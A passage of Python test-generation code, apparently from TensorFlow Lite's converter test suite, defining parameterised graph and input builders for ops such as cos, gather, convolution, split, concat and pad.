"""Make a set of tests to do cos."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the cos op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.cos(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"], parameters["input_shape"],
min_value=-np.pi, max_value=np.pi)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_log_softmax_tests(options):
"""Make a set of tests to do log_softmax."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[1, 100], [4, 2], [5, 224]],
}]
def build_graph(parameters):
"""Build the log_softmax op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.nn.log_softmax(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(
parameters["input_dtype"],
parameters["input_shape"],
min_value=-100,
max_value=9)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_maximum_tests(options):
"""Make a set of tests to do maximum."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape_1": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
"input_shape_2": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the maximum op testing graph."""
input_tensor_1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_1",
shape=parameters["input_shape_1"])
input_tensor_2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_2",
shape=parameters["input_shape_2"])
out = tf.maximum(input_tensor_1, input_tensor_2)
return [input_tensor_1, input_tensor_2], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_1"]),
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_2"])
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=8)
@register_make_test_function()
def make_minimum_tests(options):
"""Make a set of tests to do minimum."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape_1": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
"input_shape_2": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the minimum op testing graph."""
input_tensor_1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_1",
shape=parameters["input_shape_1"])
input_tensor_2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_2",
shape=parameters["input_shape_2"])
out = tf.minimum(input_tensor_1, input_tensor_2)
return [input_tensor_1, input_tensor_2], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_1"]),
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_2"])
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=8)
def make_binary_op_tests_func(binary_operator):
"""Return a function that does a test on a binary operator."""
return lambda options: make_binary_op_tests(options, binary_operator)
@register_make_test_function()
def make_add_tests(options):
make_binary_op_tests(options, tf.add)
@register_make_test_function()
def make_add_n_tests(options):
"""Make a set of tests for AddN op."""
test_parameters = [
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[2, 5, 3, 1]],
"num_inputs": [2, 3, 4, 5],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[5]],
"num_inputs": [2, 3, 4, 5],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[]],
"num_inputs": [2, 3, 4, 5],
},
]
def build_graph(parameters):
"""Builds the graph given the current parameters."""
input_tensors = []
for i in range(parameters["num_inputs"]):
input_tensors.append(
tf.placeholder(
dtype=parameters["dtype"],
name="input_{}".format(i),
shape=parameters["input_shape"]))
out = tf.add_n(input_tensors)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Builds operand inputs for op."""
input_data = []
for i in range(parameters["num_inputs"]):
input_data.append(
create_tensor_data(parameters["dtype"], parameters["input_shape"]))
return input_data, sess.run(
outputs, feed_dict={i: d for i, d in zip(inputs, input_data)})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_div_tests(options):
make_binary_op_tests(options, tf.div)
@register_make_test_function()
def make_sub_tests(options):
make_binary_op_tests(options, tf.subtract)
@register_make_test_function()
def make_mul_tests(options):
make_binary_op_tests(options, tf.multiply)
@register_make_test_function()
def make_pow_tests(options):
make_binary_op_tests(options, tf.pow, expected_tf_failures=7)
@register_make_test_function()
def make_floor_div_tests(options):
make_binary_op_tests(options, tf.floor_div)
@register_make_test_function()
def make_floor_mod_tests(options):
make_binary_op_tests(options, tf.floormod)
@register_make_test_function()
def make_squared_difference_tests(options):
make_binary_op_tests(options, tf.squared_difference)
@register_make_test_function()
def make_gather_tests(options):
"""Make a set of tests to do gather."""
test_parameters = [
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[10], [1, 2, 20]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[3], [5]],
"axis": [-1, 0, 1],
},
{
# TODO(b/123895910): add Nd support for strings.
"params_dtype": [tf.string],
"params_shape": [[8]],
"indices_dtype": [tf.int32],
"indices_shape": [[3]],
"axis": [0],
}
]
def build_graph(parameters):
"""Build the gather op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
indices = tf.placeholder(
dtype=parameters["indices_dtype"],
name="indices",
shape=parameters["indices_shape"])
axis = min(len(parameters["params_shape"]), parameters["axis"])
out = tf.gather(params, indices, axis=axis)
return [params, indices], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
indices = create_tensor_data(parameters["indices_dtype"],
parameters["indices_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, indices], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, indices])))
# Note that TF can't execute with index=1 and params_shape=[10].
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
@register_make_test_function()
def make_gather_nd_tests(options):
"""Make a set of tests to do gather_nd."""
test_parameters = [
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 1]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[1, 1]],
},
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 5]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[2, 1], [2, 2]],
},
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 5, 10]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[3, 1], [2, 2], [2, 3], [2, 1, 3]],
},
]
def build_graph(parameters):
"""Build the gather_nd op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
indices = tf.placeholder(
dtype=parameters["indices_dtype"],
name="indices",
shape=parameters["indices_shape"])
out = tf.gather_nd(params, indices)
return [params, indices], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
indices = create_tensor_data(parameters["indices_dtype"],
parameters["indices_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, indices], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, indices])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_gather_with_constant_tests(options):
"""Make a set of test which feed a constant to gather toco."""
test_parameters = [{
"input_shape": [[3]],
"reference_shape": [[2]],
}, {
"input_shape": [[2, 3]],
"reference_shape": [[2, 3]],
}]
def build_graph(parameters):
"""Build a graph where the inputs to Gather are constants."""
reference = tf.placeholder(
dtype=tf.int32, shape=parameters["reference_shape"])
gather_input = tf.constant(
create_tensor_data(tf.int32, parameters["input_shape"]))
gather_indices = tf.constant([0, 1], tf.int32)
out = tf.equal(reference, tf.gather(gather_input, gather_indices))
return [reference], [out]
def build_inputs(parameters, sess, inputs, outputs):
reference_values = np.zeros(parameters["reference_shape"], dtype=np.int32)
return [reference_values], sess.run(
outputs, feed_dict={inputs[0]: reference_values})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_embedding_lookup_tests(options):
"""Make a set of tests to do gather."""
test_parameters = [
{
"params_dtype": [tf.float32],
"params_shape": [[10], [10, 10]],
"ids_dtype": [tf.int32],
"ids_shape": [[3], [5]],
},
]
def build_graph(parameters):
"""Build the gather op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
ids = tf.placeholder(
dtype=parameters["ids_dtype"],
name="ids",
shape=parameters["ids_shape"])
out = tf.nn.embedding_lookup(params, ids)
return [params, ids], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
ids = create_tensor_data(parameters["ids_dtype"],
parameters["ids_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, ids], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, ids])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs)
@register_make_test_function()
def make_global_batch_norm_tests(options):
"""Make a set of tests to do batch_norm_with_global_normalization."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 1, 6, 2], [3, 4, 5, 4]],
"epsilon": [0.1, 0.0001],
"scale_after": [True, False],
}]
def build_graph(parameters):
"""Build the global batch norm testing graph."""
input_shape = parameters["input_shape"]
scale_shape = input_shape[3]
scale = create_tensor_data(parameters["dtype"], scale_shape)
offset = create_tensor_data(parameters["dtype"], scale_shape)
mean = create_tensor_data(parameters["dtype"], scale_shape)
variance = create_tensor_data(parameters["dtype"], scale_shape)
x = create_tensor_data(parameters["dtype"], parameters["input_shape"])
x_norm = tf.nn.batch_norm_with_global_normalization(
x, mean, variance, scale, offset,
parameters["epsilon"], parameters["scale_after"])
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.add(input_tensor, x_norm)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_fused_batch_norm_tests(options):
"""Make a set of tests to do fused_batch_norm."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 1, 6, 2]],
"epsilon": [0.001, 0.1],
}]
def build_graph(parameters):
"""Build the testing graph for fused batch normalization."""
input_shape = parameters["input_shape"]
scale_shape = input_shape[3]
scale = create_tensor_data(parameters["dtype"], scale_shape)
offset = create_tensor_data(parameters["dtype"], scale_shape)
mean = create_tensor_data(parameters["dtype"], scale_shape)
variance = create_tensor_data(parameters["dtype"], scale_shape)
x = create_tensor_data(parameters["dtype"], parameters["input_shape"])
[x_norm, _, _] = tf.nn.fused_batch_norm(
x, scale, offset, mean, variance,
parameters["epsilon"], data_format="NHWC", is_training=False)
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.add(input_tensor, x_norm)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_conv_tests(options):
"""Make a set of tests to do convolution."""
test_parameters = [
{
"input_shape": [[1, 3, 4, 3], [4, 6, 6, 1]],
"filter_shape": [[1, 1], [2, 3], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 2, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
"constant_filter": [True, False],
"channel_multiplier": [1, 2],
"fully_quantize": [False],
},
# TODO(b/134702301): The fully_quantize param is just ignored by the MLIR
# testing path now, resulting in duplicate tests. Either ignore these
# tests or handle it properly in the mlir_convert() function.
{
"input_shape": [[1, 3, 4, 3], [4, 6, 6, 1]],
"filter_shape": [[1, 1], [2, 3], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 2, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
"constant_filter": [True],
"channel_multiplier": [1, 2],
"fully_quantize": [True],
}
]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Get filter input either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
filter_input = create_tensor_data(
np.float32, filter_shape, min_value=-10, max_value=10)
input_tensors = [input_tensor]
else:
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
input_tensors = [input_tensor, filter_input]
out = tf.nn.conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [
create_tensor_data(np.float32, input_shape, min_value=-1, max_value=1)
]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, filter_shape))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=60)
# Note: This is a regression test for a bug (b/122651451) that Toco incorrectly
# erases the reduction indices array while it's shared with other ops.
@register_make_test_function()
def make_l2norm_shared_epsilon_tests(options):
"""Regression test for a bug (b/122651451)."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[5, 7]],
"dim": [1],
"epsilon": [1e-8],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
epsilon = tf.constant(parameters["epsilon"])
out1 = tf.nn.l2_normalize(input_tensor, parameters["dim"], epsilon=epsilon)
out2 = tf.nn.l2_normalize(input_tensor, parameters["dim"], epsilon=epsilon)
out = out1 + out2
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Note: This is a regression test for a bug (b/112436267) that Toco incorrectly
# fuses weights when multiple Conv2D/FULLY_CONNECTED ops share the same constant
# weight tensor.
@register_make_test_function()
def make_conv_with_shared_weights_tests(options):
"""Make a test where 2 Conv ops shared the same constant weight tensor."""
test_parameters = [{
"input_shape": [[1, 10, 10, 3]],
"filter_shape": [[3, 3]],
"strides": [[1, 1, 1, 1]],
"dilations": [[1, 1, 1, 1]],
"padding": ["SAME"],
"data_format": ["NHWC"],
"channel_multiplier": [1],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
input_tensors = [input_tensor]
# Construct a constant weights tensor which will be used by both Conv2D.
filter_tensor = tf.constant(
create_tensor_data(np.float32, filter_shape), dtype=tf.float32)
# Ensure that FuseBinaryIntoFollowingAffine works with an input which
# is shared by multiple affine ops.
conv_input = input_tensor + 0.1
# Construct 2 Conv2D operations which use exactly the same input and
# weights.
result1 = tf.nn.conv2d(
conv_input,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
result2 = tf.nn.conv2d(
conv_input,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
# Add MUL ops after Conv2D ops. These MUL ops should be fused into the
# weights of Conv2D.
result1 = result1 * 2
result2 = result2 * 3
# Add the 2 results up.
out = result1 + result2
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, unused_filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Note: This is a regression test for a bug (b/112303004) that Toco incorrectly
# transforms Conv into DepthwiseConv when two Conv ops share the same constant
# weight tensor.
@register_make_test_function()
def make_conv_to_depthwiseconv_with_shared_weights_tests(options):
"""Make a test where 2 Conv ops shared the same constant weight tensor."""
test_parameters = [{
"input_shape": [[1, 10, 10, 1]],
"filter_shape": [[3, 3]],
"strides": [[1, 1, 1, 1]],
"dilations": [[1, 1, 1, 1]],
"padding": ["SAME"],
"data_format": ["NHWC"],
"channel_multiplier": [3],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Construct a constant weights tensor which will be used by both Conv2D.
filter_tensor = tf.constant(
create_tensor_data(np.float32, filter_shape), dtype=tf.float32)
input_tensors = [input_tensor]
# Construct 2 Conv2D operations which use exactly the same input and
# weights.
result1 = tf.nn.conv2d(
input_tensor,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
result2 = tf.nn.conv2d(
input_tensor,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
# Add the 2 results up.
out = result1 + result2
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, unused_filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_depthwiseconv_tests(options):
"""Make a set of tests to do convolution."""
# Tensorflow only supports equal strides
test_parameters = [
{
"input_shape": [[1, 3, 4, 3], [1, 10, 10, 3]],
"filter_size": [[1, 1], [1, 2], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 3, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"channel_multiplier": [1, 2],
"rate": [[1, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"],
"constant_filter": [True, False],
},
{
"input_shape": [[1, 3, 4, 3]],
"filter_size": [[1, 1]],
"strides": [[1, 1, 2, 1]], # TF needs [1, x, x, 1]
"dilations": [[1, 1, 1, 1], [1, 2, 2, 1]],
"channel_multiplier": [2],
"rate": [[2, 2]], # Only [1, 1] is supported
"padding": ["SAME"],
"data_format": ["NHWC"],
"constant_filter": [True, False],
}
]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_size"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a depthwise conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Get filter input either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
filter_input = create_tensor_data(np.float32, filter_shape)
input_tensors = [input_tensor]
else:
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
input_tensors = [input_tensor, filter_input]
out = tf.nn.depthwise_conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
rate=parameters["rate"],
padding=parameters["padding"],
data_format=parameters["data_format"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, filter_shape))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=4)
@register_make_test_function()
def make_split_tests(options):
"""Make a set of tests to do tf.split."""
test_parameters = [{
"input_shape": [[1, 3, 4, 6], [2, 4, 1], [6, 4], [8]],
"num_or_size_splits": [1, 2, 3, 4, 5],
"axis": [0, 1, 2, 3, -4, -3, -2, -1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.split(
input_tensor, parameters["num_or_size_splits"], parameters["axis"])
return [input_tensor], [out[0]]
def build_inputs(parameters, sess, inputs, outputs):
values = [create_tensor_data(np.float32, parameters["input_shape"])]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=112)
@register_make_test_function()
def make_splitv_tests(options):
"""Make a set of tests to do tf.split_v."""
test_parameters = [{
"input_shape": [[1, 3, 4, 6], [2, 4, 1], [6, 4], [8]],
"size_splits": [[2, 2], [1, 3], [4, 2], [5, 3],
[-1, 1], [-1, 2], [-1, 4]],
"axis": [0, 1, 2, 3, -4, -3, -2, -1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.split(input_tensor, parameters["size_splits"], parameters["axis"])
return [input_tensor], [out[0]]
def build_inputs(parameters, sess, inputs, outputs):
values = [create_tensor_data(np.float32, parameters["input_shape"])]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=158)
@register_make_test_function()
def make_concat_tests(options):
"""Make a set of tests to do concatenation."""
test_parameters = [{
"base_shape": [[1, 3, 4, 3], [3, 4]],
"num_tensors": [1, 2, 3, 4, 5, 6],
"axis": [0, 1, 2, 3, -3, -2, -1],
"type": [tf.float32, tf.uint8, tf.int32, tf.int64],
}]
def get_shape(parameters, delta):
"""Return a tweaked version of 'base_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
if axis < 0:
axis += len(shape)
if axis < len(shape):
shape[axis] += delta
return shape
def build_graph(parameters):
all_tensors = []
for n in range(0, parameters["num_tensors"]):
input_tensor = tf.placeholder(dtype=parameters["type"],
name=("input%d" % n),
shape=get_shape(parameters, n))
all_tensors.append(input_tensor)
out = tf.concat(all_tensors, parameters["axis"])
return all_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
all_values = []
for n in range(0, parameters["num_tensors"]):
input_values = create_tensor_data(
parameters["type"], get_shape(parameters, n))
all_values.append(input_values)
return all_values, sess.run(
outputs, feed_dict=dict(zip(inputs, all_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=60)
@register_make_test_function()
def make_fully_connected_tests(options):
"""Make a set of tests to do fully_connected."""
test_parameters = [{
"shape1": [[3, 3]],
"shape2": [[3, 3]],
"transpose_a": [True, False],
"transpose_b": [True, False],
"constant_filter": [True, False],
}, {
"shape1": [[4, 4], [1, 4], [4]],
"shape2": [[4, 4], [4, 1], [4]],
"transpose_a": [False],
"transpose_b": [False],
"constant_filter": [True, False],
}, {
"shape1": [[40, 37]],
"shape2": [[37, 40]],
"transpose_a": [False],
"transpose_b": [False],
"constant_filter": [True, False],
}, {
"shape1": [[40, 37]],
"shape2": [[40, 37]],
"transpose_a": [False],
"transpose_b": [True],
"constant_filter": [True, False],
}]
def build_graph(parameters):
"""Build a matmul graph given `parameters`."""
input_tensor1 = tf.placeholder(dtype=tf.float32, name="input1",
shape=parameters["shape1"])
# Get input_tensor2 either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
input_tensor2 = create_tensor_data(np.float32, parameters["shape2"])
input_tensors = [input_tensor1]
else:
input_tensor2 = tf.placeholder(
dtype=tf.float32, name="input2", shape=parameters["shape2"])
input_tensors = [input_tensor1, input_tensor2]
out = tf.matmul(input_tensor1, input_tensor2,
transpose_a=parameters["transpose_a"],
transpose_b=parameters["transpose_b"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input_values1) or 2
# tensors (input_values1, input_values2) based on whether the second input
# is a constant or variable input.
values = [create_tensor_data(np.float32, shape=parameters["shape1"])]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, parameters["shape2"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=10)
@register_make_test_function()
def make_l2norm_tests(options):
"""Make a set of tests to do l2norm."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[5, 7], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
"dim": [0, 1, 2, 3, [2, 3], -2],
"epsilon": [None, 1e-12, 1e-3],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
if parameters["epsilon"]:
out = tf.nn.l2_normalize(
input_tensor, parameters["dim"], epsilon=parameters["epsilon"])
else:
out = tf.nn.l2_normalize(input_tensor, parameters["dim"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=9)
@register_make_test_function()
def make_local_response_norm_tests(options):
"""Make a set of tests to do local_response_norm."""
# Chose a set of parameters
test_parameters = [{
"input_shape": [[1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3]],
"depth_radius": [None, 0, 1, 3, 5],
"bias": [None, 0.3, -0.1],
"alpha": [None, 2, -3],
"beta": [None, 0.25, 2],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.local_response_normalization(
input_tensor, depth_radius=parameters["depth_radius"],
bias=parameters["bias"], alpha=parameters["alpha"],
beta=parameters["beta"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_pad_tests(options):
"""Make a set of tests to do pad."""
# TODO(nupurgarg): Add test for tf.uint8.
test_parameters = [
# 4D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 1, 2, 1], [2, 1, 1, 1]],
"paddings": [[[0, 0], [0, 1], [2, 3], [0, 0]], [[0, 1], [0, 0],
[0, 0], [2, 3]]],
"constant_paddings": [True, False],
},
# 2D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2]],
"paddings": [[[0, 1], [2, 3]]],
"constant_paddings": [True, False],
},
# 1D:
{
"dtype": [tf.int32],
"input_shape": [[1]],
"paddings": [[[1, 2]]],
"constant_paddings": [False],
},
]
def build_graph(parameters):
"""Build a pad graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
# Get paddings as either a placeholder or constants.
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="padding", shape=shape)
input_tensors = [input_tensor, paddings]
out = tf.pad(input_tensor, paddings=paddings)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_padv2_tests(options):
"""Make a set of tests to do padv2."""
